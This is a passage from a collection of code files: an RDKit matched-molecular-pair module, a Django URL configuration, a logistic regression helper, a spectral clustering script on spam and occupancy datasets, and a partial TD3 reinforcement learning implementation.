--where, --score, and --rule-selection-cutoffs.\n rule_selection_function = analysis_algorithms.get_rule_selection_function_from_args(\n parser, args)\n\n transform_tool = analysis_algorithms.get_transform_tool(dataset, rule_selection_function)\n transform_record = transform_tool.fragment_transform_smiles(args.smiles)\n if transform_record.errmsg:\n parser.error(\"Unable to fragment --smiles %r: %s\"\n % (args.smiles, transform_record.errmsg))\n\n if args.jobs > 1:\n pool = multiprocessing.Pool(processes=args.jobs)\n else:\n pool = None\n try:\n result = transform_tool.transform(\n transform_record.fragments, property_names,\n min_radius=min_radius,\n min_pairs=min_pairs,\n min_variable_size=min_variable_size,\n min_constant_size=min_constant_size,\n substructure_pat=substructure_pat,\n pool=pool,\n explain=explain,\n )\n except analysis_algorithms.EvalError as err:\n sys.stderr.write(\"ERROR: %s\\nExiting.\\n\" % (err,))\n raise SystemExit(1)\n\n return result\n except AttributeError:\n # MMPDB3\n db = dbutils.open_database(database_file)\n dataset = db.get_dataset()\n transform_tool = get_transform_tool(dataset)\n transform_record = transform_tool.fragment_transform_smiles(smiles)\n result = transform_tool.transform(transform_record.fragmentations, properties)\n return result\n\ndef create_combined_structure(constant_smiles: str, variable_smiles: str,\n attachment_order: Optional[List[int]] = None) -> Mol:\n \"\"\"\n From constant and variable substructures create combined structure with labelled atoms indicating bond cuts\n and renderer_highlight molecular property to show variable substructure.\n\n :param constant_smiles: constant portion of molecule\n :param variable_smiles: variable portion of molecule\n :param attachment_order: attachment order of variable atoms. 
If None, the attachment points in the variable_smiles should be numbered\n\n :return: Combined structure as :class:`rdkit.Chem.rdchem.Mol`\n \"\"\"\n constant_mol = Chem.MolFromSmiles(constant_smiles)\n variable_mol = Chem.MolFromSmiles(variable_smiles)\n\n variable_attachment_no = 0\n for variableNo, atom in enumerate(variable_mol.GetAtoms()):\n atom.SetBoolProp('variable', True)\n atom.SetIntProp('variableNo', variableNo)\n if atom.GetAtomicNum() == 0:\n atom.SetProp(\"attachment\", \"variable\")\n if atom.HasProp('molAtomMapNumber'):\n variable_index = atom.GetIntProp('molAtomMapNumber') - 1\n else:\n variable_index = variable_attachment_no\n if attachment_order:\n atom.SetIntProp(\"attachmentIdx\", attachment_order[variable_index])\n else:\n atom.SetIntProp(\"attachmentIdx\", variable_index)\n variable_attachment_no += 1\n\n constant_attachment_no = 0\n for atom in constant_mol.GetAtoms():\n atom.SetBoolProp('variable', False)\n if atom.GetAtomicNum() == 0:\n atom.SetProp(\"attachment\", \"constant\")\n atom.SetIntProp(\"attachmentIdx\", constant_attachment_no)\n constant_attachment_no += 1\n\n if attachment_order:\n assert variable_attachment_no == len(attachment_order)\n assert constant_attachment_no == len(attachment_order)\n\n combine_mol = Chem.CombineMols(constant_mol, variable_mol)\n Chem.SanitizeMol(combine_mol)\n mol = Chem.RWMol(combine_mol)\n n_cuts = constant_attachment_no\n mol.SetIntProp(\"nCuts\", n_cuts)\n\n for index in range(0, variable_attachment_no):\n _join_mols(mol, index)\n\n Chem.SanitizeMol(mol)\n Chem.AssignStereochemistry(mol)\n\n def highlight(atom: Atom) -> bool:\n return atom.HasProp('variable') and atom.GetBoolProp('variable')\n\n def highlight_bond(bond: Bond, highlight_atoms: List[int]) -> bool:\n start = bond.GetBeginAtomIdx()\n end = bond.GetEndAtomIdx()\n return start in highlight_atoms and end in highlight_atoms\n\n cuts_bond_idxs = [_bond_idx_for_cut(mol, cut_no) for cut_no in range(1, n_cuts + 1)]\n\n mol.SetProp(\"bond_cuts\", ' '.join([str(b + 1) for b in cuts_bond_idxs]))\n highlight_atoms = [a.GetIdx() for a in mol.GetAtoms() if highlight(a)]\n highlight_bonds = [b.GetIdx() for b in mol.GetBonds() if highlight_bond(b, highlight_atoms)]\n\n # prop_text = \"COLOR #ff0000\\nATOMS {}\\nBONDS {}\".format(' '.join([str(a + 1) for a in highlight_atoms]),\n # ' '.join([str(b + 1) for b in highlight_bonds]))\n prop_text = \"COLOR #ff0000\\nBONDS {}\".format(' '.join([str(b + 1) for b in highlight_bonds]))\n mol.SetProp('Renderer_Highlight', prop_text)\n\n return Mol(mol)\n\n\ndef _parity_shell(values):\n \"\"\"\n Determines the parity of integers in a list\n\n :param values:\n :return: parity\n \"\"\"\n\n # from http://www.dalkescientific.com/writings/diary/archive/2016/08/15/fragment_parity_calculation.html\n # Simple Shell sort; while O(N^2), we only deal with at most 4 values\n values = list(values)\n N = len(values)\n num_swaps = 0\n for i in range(N - 1):\n for j in range(i + 1, N):\n if values[i] > values[j]:\n values[i], values[j] = values[j], values[i]\n num_swaps += 1\n return num_swaps % 2\n\n\ndef _atom_ordering_before(atom: Atom, old_atom: Atom, new_atom: Atom) -> List[Atom]:\n \"\"\"\n Determine the order of neighbor atoms in the bond table, substituting new_atom for old_atom\n\n :param atom: center atom\n :param old_atom:\n :param new_atom:\n :return: Ordering\n \"\"\"\n env_before = [b.GetOtherAtom(atom) for b in atom.GetBonds()]\n index, _ = next((i, a) for i, a in enumerate(env_before) if a.GetIdx() == old_atom.GetIdx())\n 
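# substitute the incoming neighbour for the atom that will be removed, so the\n # recorded ordering matches the bond table after the fragments are joined\n 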
env_before[index] = new_atom\n return env_before\n\n\ndef _check_chirality_after(atom: Atom, env_before: List[Atom]) -> None:\n \"\"\"\n Determine if a chiral inversion has occurred around an atom after creating the combined structure\n\n :param atom:\n :param env_before: Ordering prior to merging\n \"\"\"\n ids_after = [b.GetOtherAtomIdx(atom.GetIdx()) for b in atom.GetBonds()]\n ids_before = [a.GetIdx() for a in env_before]\n parity_before = _parity_shell(ids_before)\n parity_after = _parity_shell(ids_after)\n\n if parity_before != parity_after:\n atom.InvertChirality()\n\n\ndef _set_mapping_label(atom: Atom, mapping_no: int) -> None:\n \"\"\"\n Add labels to atoms to indicate a bond cut between the constant and variable substructures\n :param atom:\n :param mapping_no:\n :return:\n \"\"\"\n atom.SetBoolProp('cutNo{}'.format(mapping_no), True)\n if atom.HasProp('molAtomMapNumber'):\n mapping_no = int('{}{}'.format(atom.GetIntProp('molAtomMapNumber'), mapping_no))\n atom.SetAtomMapNum(mapping_no)\n atom.SetIntProp('molAtomMapNumber', mapping_no)\n\n\ndef _find_neighbour_stereo_bond(mol: Mol, atom: Atom, old_atom: Atom, new_atom: Atom) -> Optional[\n Tuple[Bond, List[Atom]]]:\n \"\"\"\n Determines if any trans/cis stereo bonds are affected by the fragment joining. Returns the affected bond and defining atoms\n\n :param mol: molecule\n :param atom: center atom\n :param old_atom: old neighbor atom\n :param new_atom: new neighbor atom\n :return: Tuple of any affected bond and atoms, or None\n \"\"\"\n\n for bond in atom.GetBonds():\n stereo = bond.GetStereo()\n if stereo != BondStereo.STEREONONE:\n stereo_atoms = [mol.GetAtomWithIdx(i) for i in bond.GetStereoAtoms()]\n try:\n index, _ = next((i, a) for i, a in enumerate(stereo_atoms) if a.GetIdx() == old_atom.GetIdx())\n stereo_atoms[index] = new_atom\n except StopIteration:\n # note need to reset stereo bond information even if deleted atom is not in the list of stereo atoms\n pass\n return bond, stereo_atoms\n return None\n\n\ndef _join_mols(mol: RWMol, attachment_no: int) -> None:\n \"\"\"\n Joins two disconnected fragments in the molecule by connecting wildcard atoms for the attachment points\n\n :param mol:\n :param attachment_no:\n \"\"\"\n constant_atom = None\n variable_atom = None\n constant_neighbour = None\n variable_neighbour = None\n\n for atom in mol.GetAtoms():\n\n if atom.GetAtomicNum() == 0:\n\n if atom.HasProp(\"attachment\") and atom.GetProp(\"attachment\") == \"constant\" and atom.GetIntProp(\n \"attachmentIdx\") == attachment_no:\n constant_atom = atom\n neighbours = atom.GetNeighbors()\n assert len(neighbours) == 1\n constant_neighbour = neighbours[0]\n\n if atom.HasProp(\"attachment\") and atom.GetProp(\"attachment\") == \"variable\" and atom.GetIntProp(\n \"attachmentIdx\") == attachment_no:\n variable_atom = atom\n neighbours = atom.GetNeighbors()\n assert len(neighbours) == 1\n variable_neighbour = neighbours[0]\n\n assert constant_atom\n assert variable_atom\n assert constant_neighbour\n assert variable_neighbour\n\n variable_env_before = _atom_ordering_before(variable_neighbour, variable_atom, constant_neighbour)\n constant_env_before = _atom_ordering_before(constant_neighbour, constant_atom, variable_neighbour)\n\n stereo_bonds = {}\n t = _find_neighbour_stereo_bond(mol, variable_neighbour, variable_atom, constant_neighbour)\n if t:\n stereo_bond, stereo_atoms = t\n stereo_bonds[stereo_bond] = stereo_atoms\n t = _find_neighbour_stereo_bond(mol, constant_neighbour, constant_atom, variable_neighbour)\n if t:\n stereo_bond, stereo_atoms = t\n 
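# remember stereo bonds whose reference atoms must be reset once the\n # wildcard atoms have been removed and the fragments joined\n 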
stereo_bonds[stereo_bond] = stereo_atoms\n\n mol.RemoveAtom(constant_atom.GetIdx())\n mol.RemoveAtom(variable_atom.GetIdx())\n mol.AddBond(constant_neighbour.GetIdx(), variable_neighbour.GetIdx(), BondType.SINGLE)\n\n # see Andrew Dalke's blog for how to handle chiral centers on fragmentation\n # http://www.dalkescientific.com/writings/diary/archive/2016/08/14/fragment_chiral_molecules.html#fragment_chiral\n _check_chirality_after(variable_neighbour, variable_env_before)\n _check_chirality_after(constant_neighbour, constant_env_before)\n\n for stereo_bond in stereo_bonds:\n atom_indices = [a.GetIdx() for a in stereo_bonds[stereo_bond]]\n assert len(atom_indices) == 2\n stereo_bond.SetStereoAtoms(atom_indices[0], atom_indices[1])\n\n _set_mapping_label(variable_neighbour, attachment_no + 1)\n _set_mapping_label(constant_neighbour, attachment_no + 1)\n\n\ndef align_combined_molecules(query: Mol, mapped_query_mol: Mol, mapped_product_mol: Mol,\n constant_smiles: str) -> None:\n \"\"\"\n Align the combined query and product molecules to the initial query coordinates for the largest fragment in the\n constant smiles\n\n :param query:\n :param mapped_query_mol:\n :param mapped_product_mol:\n :param constant_smiles:\n \"\"\"\n if mapped_query_mol.HasSubstructMatch(query, useChirality=True):\n AllChem.GenerateDepictionMatching2DStructure(mapped_query_mol, query)\n else:\n AllChem.Compute2DCoords(mapped_query_mol)\n\n template_smiles = constant_smiles.split('.')[0]\n template_mol = Chem.MolFromSmarts(template_smiles)\n map = mapped_query_mol.GetSubstructMatch(template_mol, useChirality=True)\n if mapped_product_mol.HasSubstructMatch(template_mol, useChirality=True) \\\n and map:\n template_conformer = Conformer(template_mol.GetNumAtoms())\n query_conformer = mapped_query_mol.GetConformer(0)\n for template_no, query_no in enumerate(map):\n query_point = query_conformer.GetAtomPosition(query_no)\n # print('x {} y {} z {}'.format(query_point.x, query_point.y, query_point.z))\n template_conformer.SetAtomPosition(template_no, Point3D(query_point.x, query_point.y, query_point.z))\n template_mol.AddConformer(template_conformer)\n AllChem.GenerateDepictionMatching2DStructure(mapped_product_mol, template_mol)\n else:\n AllChem.Compute2DCoords(mapped_product_mol)\n\n\ndef result_to_mmp_transform(query: Mol, result: TransformResult) -> MmpTransform:\n \"\"\"\n Map the data structures returned from an MMPDB query search to our own data structures.\n\n :param query:\n :param result:\n :return:\n \"\"\"\n\n if not query.GetNumConformers():\n AllChem.Compute2DCoords(query)\n else:\n rescale_bond_lengths(query)\n\n property_ids, properties = zip(*result.property_info_list)\n products = []\n last_from_smiles = None\n last_to_smiles = None\n last_constant_smiles = None\n\n for product_no, tp in enumerate(result.transform_products):\n product_smiles = tp.smiles\n transform_products = []\n has_product_with_rule = False\n for rule in tp.property_rules:\n\n if not rule or not rule.property_rule:\n transform_products.append(None)\n continue\n\n has_product_with_rule = True\n reversed = True if rule.property_rule and rule.is_reversed == 1 else False\n from_smiles = add_attachment_order_to_smiles(rule.variable_smiles)\n # for multiple properties the previous product will often be the same as this one. 
If it is reuse it\n previous_matches = last_from_smiles == from_smiles and last_to_smiles == rule.to_smiles \\\n and last_constant_smiles == rule.constant_smiles\n\n if not previous_matches:\n\n # create combined structure with labeled variable atoms and attachment points\n mapped_query_mol = create_combined_structure(rule.constant_smiles, from_smiles)\n mapped_product_mol = create_combined_structure(rule.constant_smiles, rule.to_smiles)\n\n # align around constant core for depiction\n align_combined_molecules(query, mapped_query_mol, mapped_product_mol, rule.constant_smiles)\n\n # identify a reasonable minimal difference between query and product. This is usually some subset of\n # the from_smiles pattern. We can look for differences in just the transform or in the whole molecule.\n # whole molecule MCSs are better, but slower. There are some edge cases where it is not possible to get\n # a reasonable difference without looking at the whole molecule.\n whole_molecule_mcs = False\n if whole_molecule_mcs:\n mapping = mcs_with_constant_smiles(mapped_query_mol, mapped_product_mol, rule.constant_smiles)\n query_mapping, _ = list(zip(*mapping))\n query_missing = [a for a in range(mapped_query_mol.GetNumAtoms()) if a not in query_mapping]\n else:\n from_mol = Chem.MolFromSmiles(from_smiles)\n to_mol = Chem.MolFromSmiles(rule.to_smiles)\n fragment_mapping = mcs_match_fragments(from_mol, to_mol)\n query_mapping, _ = list(zip(*fragment_mapping)) if fragment_mapping else [(), ()]\n query_missing = [atom.GetIdx() for atom in mapped_query_mol.GetAtoms()\n if\n atom.HasProp('variableNo') and atom.GetIntProp(\n 'variableNo') not in query_mapping]\n for atom in from_mol.GetAtoms():\n if atom.GetAtomicNum() == 0 and atom.GetIdx() not in query_mapping:\n cut_no = atom.GetAtomMapNum()\n wildcard_match = _atom_matching_wildcard(mapped_query_mol, cut_no)\n query_missing.append(wildcard_match)\n\n for missing_idx in query_missing:\n mapped_query_mol.GetAtomWithIdx(missing_idx).SetBoolProp('missing', True)\n\n # find missing atoms in original query\n reference_missing = map_labelled_atoms_to_reference(query, mapped_query_mol)\n\n # this removes annoying substructure highlighting in IPythonConsole\n # (which monkey patches substructure search)\n if hasattr(mapped_product_mol, '__sssAtoms'):\n delattr(mapped_product_mol, '__sssAtoms')\n if hasattr(mapped_query_mol, '__sssAtoms'):\n setattr(mapped_query_mol, '__sssAtoms', query_missing)\n\n last_from_smiles = from_smiles\n last_constant_smiles = rule.constant_smiles\n last_to_smiles = rule.to_smiles\n\n transform_product = MmpTransformProduct(from_smiles=from_smiles, to_smiles=rule.to_smiles,\n n_pairs=rule.count, reversed=reversed, radius=rule.radius,\n value=rule.avg, rule_environment_id=rule.rule_environment_id,\n query=mapped_query_mol,\n product=mapped_product_mol,\n constant_smiles=rule.constant_smiles,\n query_reference_missing=reference_missing)\n transform_products.append(transform_product)\n\n if has_product_with_rule:\n product = MmpProduct(query=query, product=product_smiles, transform_products=transform_products)\n products.append(product)\n return MmpTransform(query=query, property_names=properties, products=products, property_ids=property_ids)\n\n\ndef environment_rule_pairs(rule_environment_id: int, reverse: bool, property_name, database_file: str) \\\n -> MmpEnvironment:\n \"\"\"\n Recover the database of molecule pairs that are used for an environment rule\n\n :param rule_environment_id:\n :param reverse:\n :param property_name:\n :param 
database_file:\n :return:\n \"\"\"\n db = open_database(database_file)\n cursor = db.get_cursor()\n\n query = 'select compound1_id, compound2_id from pair where rule_environment_id = ?'\n cursor.execute(query, [rule_environment_id])\n pairs = []\n for compound1_id, compound2_id in cursor.fetchall():\n if reverse:\n compound1_id, compound2_id = compound2_id, compound1_id\n\n query = \"\"\" select public_id, clean_smiles, value \n from compound c, compound_property cp, property_name pn\n where c.id = ?\n and pn.name = ?\n and c.id = cp.compound_id \n and cp.property_name_id = pn.id\"\"\"\n cursor.execute(query, (compound1_id, property_name))\n (compound1_name, compound1_smiles, compound1_value) = cursor.fetchone()\n cursor.execute(query, (compound2_id, property_name))\n (compound2_name, compound2_smiles, compound2_value) = cursor.fetchone()\n pair = MmpPair(from_id=compound1_name, from_smiles=compound1_smiles, from_property=compound1_value,\n to_id=compound2_name, to_smiles=compound2_smiles, to_property=compound2_value)\n pairs.append(pair)\n\n return MmpEnvironment(pairs=pairs)\n\n\ndef _atom_has_cut_no(atom: Atom, cut_no: int) -> bool:\n \"\"\"\n Return true if this atom is labelled with the cut point\n\n :param atom:\n :param cut_no:\n :return:\n \"\"\"\n prop = 'cutNo{}'.format(cut_no)\n if atom.HasProp(prop) and atom.GetBoolProp(prop):\n return True\n return False\n\n\ndef _bond_idx_for_cut(mol: Mol, cut_no: int) -> int:\n \"\"\"\n Find the bond index for a given cut\n\n :param mol:\n :param cut_no:\n :return:\n \"\"\"\n for atom in mol.GetAtoms():\n if _atom_has_cut_no(atom, cut_no):\n for neighbor in atom.GetNeighbors():\n if _atom_has_cut_no(neighbor, cut_no):\n bond = mol.GetBondBetweenAtoms(atom.GetIdx(), neighbor.GetIdx())\n return bond.GetIdx()\n raise RuntimeError('Unable to find neighbor atom in cut')\n raise ValueError('Unable to find cut {} in molecule'.format(cut_no))\n\n\ndef _atom_matching_wildcard(mol: Mol, cut_no: int) -> int:\n \"\"\"\n Find the index of the atom in a combined molecule that matches the transform dummy atom for the given\n cut (this is the atom in the constant part of the molecule that matches the cut)\n\n :param mol:\n :param cut_no:\n :return:\n \"\"\"\n return next(atom.GetIdx() for atom in mol.GetAtoms()\n if _atom_has_cut_no(atom, cut_no) and not atom.GetBoolProp('variable'))\n\n\ndef add_attachment_order_to_smiles(smiles: str, attachment_order: Optional[List[int]] = None) -> str:\n \"\"\"\n Adds the specified mapping numbers to the transform smiles\n\n :param smiles:\n :param attachment_order:\n :return:\n \"\"\"\n mol = Chem.MolFromSmiles(smiles)\n atoms = [a for a in mol.GetAtoms() if a.GetAtomicNum() == 0]\n if not attachment_order:\n attachment_order = range(len(atoms))\n assert (len(atoms) == len(attachment_order))\n for attachment_no, atom in zip(attachment_order, atoms):\n atom.SetIntProp('molAtomMapNumber', attachment_no + 1)\n return Chem.MolToSmiles(mol, True)\n\n\ndef database_property_names(database_file: str) -> List[str]:\n \"\"\"\n Returns all the property names for a MMPDB database\n\n :param database_file:\n :return:\n \"\"\"\n dbinfo = DBFile(database_file)\n database = dbinfo.open_database()\n dataset = database.get_dataset()\n return dataset.get_property_names()\n","repo_name":"Glysade/DataFxnPylib","sub_path":"pylib_3.9.7/ruse/rdkit/mmp.py","file_name":"mmp.py","file_ext":"py","file_size_in_byte":37769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"69850418408","text":"\"\"\"hyperjob URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom vacancy.views import IndexView, VacanciesView, MySignupView, MyLoginView, HomeView, NewVacancyView\nfrom resume.views import ResumesView, NewResumeView\nfrom django.views.generic import RedirectView\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path(\"\", IndexView.as_view()),\n path(\"vacancies\", VacanciesView.as_view()),\n path(\"resumes\", ResumesView.as_view()),\n path(\"signup\", MySignupView.as_view()),\n path(\"login\", MyLoginView.as_view()),\n path('login/', RedirectView.as_view(url='/login')),\n path('signup/', RedirectView.as_view(url='/signup')),\n path('resumes/', RedirectView.as_view(url='/resumes')),\n path('vacancies/', RedirectView.as_view(url='/vacancies')),\n path(\"home\", HomeView.as_view()),\n path('home/', RedirectView.as_view(url='/home')),\n path(\"vacancy/new\", NewVacancyView.as_view()),\n path('vacancy/new/', RedirectView.as_view(url='/vacancy/new')),\n path(\"resume/new\", NewResumeView.as_view()),\n path('resume/new/', RedirectView.as_view(url='/resume/new')),\n]\n","repo_name":"carlokruger/hyperjob","sub_path":"hyperjob/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10116671743","text":"from sklearn.metrics import roc_auc_score\nfrom sklearn.linear_model import LogisticRegression\n\ndef train_model(train_data):\n features = ['height','weight','age', 'aids', 'cirrhosis', 'hepatic_failure', 'immunosuppression', 'leukemia', 'lymphoma', 'solid_tumor_with_metastasis']\n target = 'diabetes_mellitus'\n \n X_train = train_data[features]\n y_train = train_data[target]\n \n model = LogisticRegression()\n model.fit(X_train, y_train)\n \n return model\n\ndef predict_and_evaluate(model, train_data, test_data):\n X_train = train_data[['height','weight', 'age', 'aids', 'cirrhosis', 'hepatic_failure', 'immunosuppression', 'leukemia', 'lymphoma', 'solid_tumor_with_metastasis']]\n X_test = test_data[['height','weight', 'age', 'aids', 'cirrhosis', 'hepatic_failure', 'immunosuppression', 'leukemia', 'lymphoma', 'solid_tumor_with_metastasis']]\n \n train_preds = model.predict_proba(X_train)[:, 1]\n test_preds = model.predict_proba(X_test)[:, 1]\n \n train_roc_auc = roc_auc_score(train_data['diabetes_mellitus'], train_preds)\n test_roc_auc = roc_auc_score(test_data['diabetes_mellitus'], test_preds)\n \n train_data['predictions'] = train_preds\n test_data['predictions'] = test_preds\n \n return train_data, test_data, train_roc_auc, 
test_roc_auc\n\n","repo_name":"AlvaroOrtiz2001/HW3-Computing-for-Data-Science","sub_path":"analysis/my_library/processing_data_lib/modeling.py","file_name":"modeling.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14242295156","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nfrom scipy.spatial import distance\r\nimport scipy.cluster.hierarchy as shc\r\nfrom sklearn.cluster import KMeans, AgglomerativeClustering, SpectralClustering\r\nfrom sklearn import metrics\r\nfrom sklearn.metrics import classification_report, confusion_matrix\r\nfrom numpy import linalg as LA\r\nfrom scipy.sparse import csgraph\r\n\r\n\r\n \r\ndef readDataSpam(filename):\r\n infile = open(filename)\r\n data = infile.readlines()\r\n for i in range(len(data)):\r\n data[i] = data[i].split(\",\")\r\n for j in range(len(data[i])):\r\n data[i][j] = float(data[i][j])\r\n \r\n return data\r\n\r\ndef readDataOcc(filename):\r\n infile = open(filename)\r\n data = infile.readlines()\r\n data = data[1:]\r\n for i in range(len(data)):\r\n data[i] = data[i].split(\",\")\r\n del data[i][0]\r\n del data[i][0]\r\n for j in range(len(data[i])):\r\n data[i][j] = float(data[i][j])\r\n \r\n return data\r\n\r\n\r\n\r\nspamData = readDataSpam(\"spambase.data\")\r\noccData = readDataOcc(\"datatest.txt\")\r\nrightSpamData = []\r\nrightOccData = []\r\nfor i in range(len(spamData)):\r\n rightSpamData.append(spamData[i][len(spamData[i])-1])\r\n spamData[i] = spamData[i][:len(spamData[i])-1]\r\n \r\nfor i in range(len(occData)):\r\n rightOccData.append(occData[i][len(occData[i])-1])\r\n occData[i] = occData[i][:len(occData[i])-1]\r\n \r\n\r\ndef normalize(dataset):\r\n array = dataset\r\n temp = np.amax(dataset, axis =0)\r\n temp = temp.tolist()\r\n for i in range(0, len(array)):\r\n for j in range(0, len(array[i])):\r\n array[i][j] = np.around(array[i][j] / temp[j], decimals =5)\r\n return array\r\n\r\nspamDataNorm = normalize(spamData)\r\noccDataNorm = normalize(occData)\r\n\r\ndef eigenDecomposition(AffMatrix, plot = False):\r\n # Compute Laplacian matrix, L = D - A\r\n L = csgraph.laplacian(AffMatrix)\r\n # Compute eigenvalues from |L - uI| = 0 and eigenvectors from Lx = ux\r\n eigenvalues, eigenvectors = LA.eigh(L)\r\n\r\n # A plot for the eigenvalues of the affinity matrix\r\n if plot:\r\n plt.figure(figsize=(14, 6))\r\n plt.title(\"Largest eigenvalues of input matrix\")\r\n plt.scatter(np.arange(len(eigenvalues)), np.round((eigenvalues), decimals = 2))\r\n plt.grid()\r\n plt.show()\r\n print(np.round((eigenvalues), decimals = 2))\r\n # Compute the largest eigengap\r\n index_largest_gap = np.argmax(np.diff(np.round((eigenvalues), decimals = 2)))\r\n print(index_largest_gap)\r\n # Find the optimal number of clusters from the maximum eigengap\r\n nb_clusters = index_largest_gap + 2\r\n return nb_clusters, eigenvalues, eigenvectors\r\n\r\ndef SpectralClusteringFunc(K, dataset, rightdataset):\r\n cluster = SpectralClustering(n_clusters=K, affinity = 'cosine')\r\n cluster.fit(dataset)\r\n #print(cluster.labels_)\r\n \r\n \r\n affinity_matrix = cluster.affinity_matrix_\r\n k, _, _ = eigenDecomposition(affinity_matrix)\r\n print(f'Optimal number of clusters are: {k}')\r\n \r\n \r\n contingency_matrix = metrics.cluster.contingency_matrix(rightdataset, cluster.labels_)\r\n purity = np.sum(np.amax(contingency_matrix, axis=0)) / len(dataset)\r\n print(\"Purity for %d Clusters is: %f\" % (K, 
purity))\r\n\r\n # For the majority class in each cluster\r\n clustersCategories = []\r\n for i in range(K):\r\n\r\n if contingency_matrix[0][i] > contingency_matrix[1][i]:\r\n clustersCategories.append(0)\r\n else:\r\n clustersCategories.append(1)\r\n\r\n # For the F-Measure\r\n TotalFMeasure = 0\r\n for i in range(K): # For each cluster\r\n TruePositive = 0\r\n TrueNegative = 0\r\n FalsePositive = 0\r\n FalseNegative = 0\r\n for j in range(len(dataset)): # For each example\r\n label = cluster.labels_[j] # Keep the label of the example according to the clustering\r\n if (label != i): # if it is not the same as the cluster under examination\r\n continue\r\n else: # if it is the same\r\n if rightdataset[j] == clustersCategories[label] and clustersCategories[label] == 1:\r\n TruePositive = TruePositive + 1\r\n elif rightdataset[j] == clustersCategories[label] and clustersCategories[label] == 0:\r\n TrueNegative = TrueNegative + 1\r\n elif rightdataset[j] != clustersCategories[label] and clustersCategories[label] == 1:\r\n FalsePositive = FalsePositive + 1\r\n elif rightdataset[j] != clustersCategories[label] and clustersCategories[label] == 0:\r\n FalseNegative = FalseNegative + 1\r\n\r\n if TruePositive != 0 and FalsePositive != 0:\r\n precision = TruePositive / (TruePositive + FalsePositive)\r\n recall = TruePositive / (TruePositive + FalseNegative)\r\n F1 = 2 / ((1 / precision) + (1 / recall))\r\n else:\r\n precision = 0\r\n recall = 0\r\n F1 = 0\r\n\r\n TotalFMeasure = TotalFMeasure + F1\r\n print(\"Total F-Measure for %d Clusters is: %f\" % (K, TotalFMeasure))\r\n\r\nprint(\"Spectral Clustering for Spambase Data:\")\r\nSpectralClusteringFunc(4600, spamDataNorm, rightSpamData)\r\nprint(\"\\n\")\r\nprint(\"Spectral Clustering for Occupancy Data:\")\r\n#SpectralClusteringFunc(31, occDataNorm, rightOccData)\r\n\r\n","repo_name":"GeoKrom/UoI-Pattern-Recognition-course","sub_path":"Clustering Algorithms/SpectralClustering.py","file_name":"SpectralClustering.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75257188648","text":"import copy\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport utils\nimport tracker\nimport time\n\n# Implementation of Twin Delayed Deep Deterministic Policy Gradients (TD3)\n# Paper: https://arxiv.org/abs/1802.09477\n\n\nclass Actor(nn.Module):\n def __init__(self,\n state_dim,\n action_dim,\n max_action,\n pi : list = [400, 300],\n activation_fn: str = \"relu\",\n device: str = \"cuda\"\n ):\n\n super(Actor, self).__init__()\n self.device = device\n self.pi = nn.Sequential()\n in_size = state_dim\n for layer_sz in pi:\n self.pi.append(nn.Linear(in_size, layer_sz))\n in_size = layer_sz\n self.pi.append(nn.Linear(in_size, action_dim))\n self.max_action = max_action\n\n if activation_fn == \"relu\":\n self.activation_fn = F.relu\n elif activation_fn == \"tanh\":\n self.activation_fn = nn.Tanh()\n\n def forward(self, state):\n x = state\n for i in range(len(self.pi)-1):\n x = self.activation_fn(self.pi[i](x))\n return self.max_action * torch.tanh(self.pi[-1](x))\n\n def select_action(self, state):\n state = torch.FloatTensor(state.reshape(1, -1)).to(self.device)\n return self.forward(state).cpu().data.numpy().flatten()\n\nclass Critic(nn.Module):\n def __init__(self,\n state_dim,\n action_dim,\n qf : list = [400, 300],\n activation_fn: str = \"relu\"\n ):\n super(Critic, self).__init__()\n\n if activation_fn == \"relu\":\n 
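# store the activation as a plain callable so forward() can apply it directly\n 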
self.activation_fn = F.relu\n elif activation_fn == \"tanh\":\n self.activation_fn = nn.Tanh()\n\n # Q1 architecture\n self.qf1 = nn.Sequential()\n in_size = state_dim + action_dim\n for layer_sz in qf:\n self.qf1.append(nn.Linear(in_size, layer_sz))\n in_size = layer_sz\n self.qf1.append(nn.Linear(in_size, 1))\n\n # Q2 architecture\n self.qf2 = nn.Sequential()\n in_size = state_dim + action_dim\n for layer_sz in qf:\n self.qf2.append(nn.Linear(in_size, layer_sz))\n in_size = layer_sz\n self.qf2.append(nn.Linear(in_size, 1))\n\n def forward(self, state, action):\n sa = torch.cat([state, action], 1)\n\n q1 = sa\n for i in range(len(self.qf1)-1):\n q1 = self.activation_fn(self.qf1[i](q1))\n q1 = self.qf1[-1](q1)\n\n q2 = sa\n for i in range(len(self.qf2)-1):\n q2 = self.activation_fn(self.qf2[i](q2))\n q2 = self.qf2[-1](q2)\n\n return q1, q2\n\n\n def Q1(self, state, action):\n sa = torch.cat([state, action], 1)\n\n q1 = sa\n for i in range(len(self.qf1)-1):\n q1 = self.activation_fn(self.qf1[i](q1))\n q1 = self.qf1[-1](q1)\n return q1\n\nclass TD3(object):\n def __init__(\n self,\n max_action,\n hyperparameters,\n train_env,\n device:str = \"cpu\",\n early_stopping:int = 100_000,\n state_dim:int = 23, # used when a training environment is not supplied\n action_dim:int = 3, # used when a training environment is not supplied\n verbose: int = 0\n ):\n self.device=device\n if device == \"cuda\":\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n else:\n self.device = torch.device(\"cpu\")\n\n if verbose == 1:\n print(f\"Model TD3 is configured to device {self.device}\")\n\n self.train_env = train_env\n\n if self.train_env is not None:\n state_dim = 